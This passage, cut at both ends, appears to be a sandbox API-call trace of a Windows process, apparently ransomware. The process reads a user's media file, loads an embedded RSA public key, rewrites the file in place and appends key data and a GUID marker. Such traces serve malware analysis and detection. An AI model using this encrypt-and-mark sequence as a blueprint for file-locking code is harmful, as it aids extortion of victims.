fZX23r02sYWxh\\BTrak.swf" (normalized: "c:\\users\\keecfmwgj\\videos\\fpzctgqi5ys\\m fzx23r02sywxh\\btrak.swf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x584 [0198.350] GetFileSizeEx (in: hFile=0x584, lpFileSize=0x2f9fb40 | out: lpFileSize=0x2f9fb40*=39447) returned 1 [0198.351] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2620000 [0198.357] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0x99f1, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0198.357] ReadFile (in: hFile=0x584, lpBuffer=0x2620000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x2f9fb78, lpOverlapped=0x0 | out: lpBuffer=0x2620000*, lpNumberOfBytesRead=0x2f9fb78*=0x26, lpOverlapped=0x0) returned 1 [0198.359] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7a40 [0198.359] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7a40 | out: hHeap=0x2c0000) returned 1 [0198.360] SetFilePointer (in: hFile=0x584, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0198.360] ReadFile (in: hFile=0x584, lpBuffer=0x2620000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x2f9fb70, lpOverlapped=0x0 | out: lpBuffer=0x2620000*, lpNumberOfBytesRead=0x2f9fb70*=0x9a17, lpOverlapped=0x0) returned 1 [0198.362] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0198.362] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1f1) returned 0x2a7d6f0 [0198.362] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0198.362] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0198.362] CryptAcquireContextW (in: phProv=0x2f9fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2f9fa50*=0x31b8e8) returned 1 [0198.364] CryptCreateHash (in: hProv=0x31b8e8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2f9fa58 | out: phHash=0x2f9fa58) returned 1 [0198.364] CryptHashData (hHash=0x2a05de8, pbData=0x2a7d6f0, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0198.364] CryptGetHashParam (in: hHash=0x2a05de8, dwParam=0x2, pbData=0x0, pdwDataLen=0x2f9fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x2f9fa54) returned 1 [0198.364] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x11) returned 0x2a26b08 [0198.364] CryptGetHashParam (in: hHash=0x2a05de8, dwParam=0x2, pbData=0x2a26b08, pdwDataLen=0x2f9fa54, dwFlags=0x0 | out: pbData=0x2a26b08, pdwDataLen=0x2f9fa54) returned 1 [0198.364] GetLastError () returned 0x0 [0198.364] CryptDestroyHash (hHash=0x2a05de8) returned 1 [0198.364] CryptReleaseContext (hProv=0x31b8e8, dwFlags=0x0) returned 1 [0198.364] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a7d6f0 | out: hHeap=0x2c0000) returned 1 [0198.364] UuidCreate (in: Uuid=0x2f9fa48 | out: Uuid=0x2f9fa48) returned 0x0 [0198.364] UuidToStringA (in: Uuid=0x2f9fa48, StringUuid=0x2f9fa40 | out: StringUuid=0x2f9fa40) returned 0x0 [0198.365] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a42698 [0198.365] RpcStringFreeA (in: String=0x2f9fa40 | out: String=0x2f9fa40) returned 0x0 [0198.365] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a424d8 | out: hHeap=0x2c0000) returned 1 [0198.365] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a424d8 [0198.365] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x9a20) returned 0x2af7168 [0198.365] SetFilePointer (in: hFile=0x584, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0198.366] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42698 | out: hHeap=0x2c0000) returned 1 [0198.366] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1f0) returned 0x2a7d6f0 [0198.366] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a42698 [0198.366] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1f0) returned 0x2af3f88 [0198.366] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x58) returned 0x29b9f30 [0198.366] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2aeab60 [0198.366] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae68a8 [0198.366] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2aeaba8 [0198.366] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae68c0 [0198.366] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae68f0 [0198.366] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6950 [0198.367] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6908 [0198.367] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x24) returned 0x2a06f58 [0198.367] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x158) returned 0x2aebfa0 [0198.367] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x0, Ptr=0x2aebfa0, Size=0x218) returned 0x2aedfa0 [0198.367] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x558) returned 0x2af4180 [0198.367] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae68f0 | out: hHeap=0x2c0000) returned 1 [0198.367] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6908 | out: hHeap=0x2c0000) returned 1 [0198.367] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6950 | out: hHeap=0x2c0000) returned 1 [0198.367] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a06f58 | out: hHeap=0x2c0000) returned 1 [0198.368] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af4180 | out: hHeap=0x2c0000) returned 1 [0198.368] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6950 [0198.368] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e30 [0198.368] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae6908 [0198.368] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x2a26ae8 [0198.368] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x9) returned 0x2ae68f0 [0198.368] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7de0 [0198.368] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10e) returned 0x2f5b18 [0198.368] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7a40 [0198.368] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x58) returned 0x29b9ed0 [0198.368] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x2a26b08 [0198.368] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x104) returned 0x2a19588 [0198.368] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x2a26ac8 [0198.368] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7db0 [0198.369] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5b18 | out: hHeap=0x2c0000) returned 1 [0198.369] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6908 | out: hHeap=0x2c0000) returned 1 [0198.369] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7de0 | out: hHeap=0x2c0000) returned 1 [0198.369] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae68f0 | out: hHeap=0x2c0000) returned 1 [0198.369] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26ae8 | out: hHeap=0x2c0000) returned 1 [0198.369] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e30 | out: hHeap=0x2c0000) returned 1 [0198.369] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6950 | out: hHeap=0x2c0000) returned 1 [0198.369] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7a40 | out: hHeap=0x2c0000) returned 1 [0198.370] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29b9f30 | out: hHeap=0x2c0000) returned 1 [0198.370] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2aedfa0 | out: hHeap=0x2c0000) returned 1 [0198.370] GetCurrentThreadId () returned 0x5d8 [0198.370] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae00c8 [0198.370] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x82) returned 0x2af52a0 [0198.370] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x2c) returned 0x2a42548 [0198.370] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b8e8 [0198.371] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x148) returned 0x2ae2eb8 [0198.371] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e30 [0198.371] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7de0 [0198.371] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae02d8 [0198.371] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0198.371] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0198.371] GetCurrentThreadId () returned 0x5d8 [0198.371] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0198.372] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0198.372] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xeb) returned 0x2f5b18 [0198.372] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0198.372] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0198.372] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0198.373] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0198.373] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5b18 | out: hHeap=0x2c0000) returned 1 [0198.373] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2adffc0 [0198.373] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e30 | out: hHeap=0x2c0000) returned 1 [0198.373] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4c) returned 0x2a40528 [0198.373] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e30 [0198.373] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae01d0 [0198.373] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e40 [0198.373] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6950 [0198.373] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e40 | out: hHeap=0x2c0000) returned 1 [0198.373] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e40 [0198.373] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e10 [0198.373] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e20 [0198.373] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e00 [0198.373] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7dc0 [0198.374] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e50 [0198.374] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7da0 [0198.374] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae68f0 [0198.374] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e10 | out: hHeap=0x2c0000) returned 1 [0198.374] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e10 [0198.374] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e40 | out: hHeap=0x2c0000) returned 1 [0198.374] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e40 [0198.374] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e70 [0198.374] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e80 [0198.374] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e60 [0198.374] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae6908 [0198.374] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e80 | out: hHeap=0x2c0000) returned 1 [0198.374] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x2a26ae8 [0198.374] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e70 | out: hHeap=0x2c0000) returned 1 [0198.374] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae68d8 [0198.374] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e60 | out: hHeap=0x2c0000) returned 1 [0198.374] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae6968 [0198.374] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e40 | out: hHeap=0x2c0000) returned 1 [0198.374] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e40 [0198.375] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e50 | out: hHeap=0x2c0000) returned 1 [0198.375] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6938 [0198.375] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e40 | out: hHeap=0x2c0000) returned 1 [0198.375] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6920 [0198.375] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e20 | out: hHeap=0x2c0000) returned 1 [0198.375] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae6980 [0198.375] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6920 | out: hHeap=0x2c0000) returned 1 [0198.375] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae6920 [0198.375] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6938 | out: hHeap=0x2c0000) returned 1 [0198.375] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e20 [0198.375] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e30 | out: hHeap=0x2c0000) returned 1 [0198.375] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x2a26aa8 [0198.375] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e20 | out: hHeap=0x2c0000) returned 1 [0198.375] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1c) returned 0x2ad7a40 [0198.375] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae68f0 | out: hHeap=0x2c0000) returned 1 [0198.375] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae68f0 [0198.375] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e10 | out: hHeap=0x2c0000) returned 1 [0198.375] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x204) returned 0x2af4180 [0198.375] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6950 | out: hHeap=0x2c0000) returned 1 [0198.375] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x108) returned 0x2a198d0 [0198.376] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6980 | out: hHeap=0x2c0000) returned 1 [0198.376] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x210) returned 0x2af4390 [0198.376] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7a40 | out: hHeap=0x2c0000) returned 1 [0198.376] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10c) returned 0x2f5b18 [0198.376] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e00 | out: hHeap=0x2c0000) returned 1 [0198.376] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x108) returned 0x2a197b8 [0198.376] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae68f0 | out: hHeap=0x2c0000) returned 1 [0198.376] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x200) returned 0x2af45a8 [0198.376] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a198d0 | out: hHeap=0x2c0000) returned 1 [0198.377] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae04e8 [0198.377] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7de0 | out: hHeap=0x2c0000) returned 1 [0198.377] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b8e8 | out: hHeap=0x2c0000) returned 1 [0198.377] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2adffc0 | out: hHeap=0x2c0000) returned 1 [0198.378] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae04e8 | out: hHeap=0x2c0000) returned 1 [0198.378] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26aa8 | out: hHeap=0x2c0000) returned 1 [0198.378] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a197b8 | out: hHeap=0x2c0000) returned 1 [0198.378] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af4390 | out: hHeap=0x2c0000) returned 1 [0198.379] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af45a8 | out: hHeap=0x2c0000) returned 1 [0198.379] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5b18 | out: hHeap=0x2c0000) returned 1 [0198.379] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7dc0 | out: hHeap=0x2c0000) returned 1 [0198.379] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6920 | out: hHeap=0x2c0000) returned 1 [0198.379] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7da0 | out: hHeap=0x2c0000) returned 1 [0198.379] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6968 | out: hHeap=0x2c0000) returned 1 [0198.379] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26ae8 | out: hHeap=0x2c0000) returned 1 [0198.379] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6908 | out: hHeap=0x2c0000) returned 1 [0198.379] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae68d8 | out: hHeap=0x2c0000) returned 1 [0198.380] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae2eb8 | out: hHeap=0x2c0000) returned 1 [0198.380] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42548 | out: hHeap=0x2c0000) returned 1 [0198.380] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae02d8 | out: hHeap=0x2c0000) returned 1 [0198.380] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae68c0 | out: hHeap=0x2c0000) returned 1 [0198.381] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2aeaba8 | out: hHeap=0x2c0000) returned 1 [0198.381] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af4180 | out: hHeap=0x2c0000) returned 1 [0198.382] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae01d0 | out: hHeap=0x2c0000) returned 1 [0198.382] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40528 | out: hHeap=0x2c0000) returned 1 [0198.382] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a19588 | out: hHeap=0x2c0000) returned 1 [0198.382] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26b08 | out: hHeap=0x2c0000) returned 1 [0198.383] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7db0 | out: hHeap=0x2c0000) returned 1 [0198.383] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26ac8 | out: hHeap=0x2c0000) returned 1 [0198.383] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29b9ed0 | out: hHeap=0x2c0000) returned 1 [0198.383] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3f88 | out: hHeap=0x2c0000) returned 1 [0198.384] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42698 | out: hHeap=0x2c0000) returned 1 [0198.384] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a7d6f0 | out: hHeap=0x2c0000) returned 1 [0198.384] WriteFile (in: hFile=0x584, lpBuffer=0x2af7168*, nNumberOfBytesToWrite=0x9a12, lpNumberOfBytesWritten=0x2f9fb14, lpOverlapped=0x0 | out: lpBuffer=0x2af7168*, lpNumberOfBytesWritten=0x2f9fb14*=0x9a12, lpOverlapped=0x0) returned 1 [0198.385] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af7168 | out: hHeap=0x2c0000) returned 1 [0198.385] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0x9a17, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0198.385] WriteFile (in: hFile=0x584, lpBuffer=0x2ae00c8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2f9fb50, lpOverlapped=0x0 | out: lpBuffer=0x2ae00c8*, lpNumberOfBytesWritten=0x2f9fb50*=0x100, lpOverlapped=0x0) returned 1 [0198.386] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae00c8 | out: hHeap=0x2c0000) returned 1 [0198.386] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2efb0 [0198.386] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x428) returned 0x2af3f88 [0198.386] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2af3f88, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 41 [0198.386] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x430) returned 0x2af43b8 [0198.386] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3f88 | out: hHeap=0x2c0000) returned 1 [0198.387] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2efb0 | out: hHeap=0x2c0000) returned 1 [0198.387] WriteFile (in: hFile=0x584, lpBuffer=0x2af43b8*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x2f9fb50, lpOverlapped=0x0 | out: lpBuffer=0x2af43b8*, lpNumberOfBytesWritten=0x2f9fb50*=0x28, lpOverlapped=0x0) returned 1 [0198.387] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af43b8 | out: hHeap=0x2c0000) returned 1 [0198.387] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0198.387] WriteFile (in: hFile=0x584, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x2f9fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, 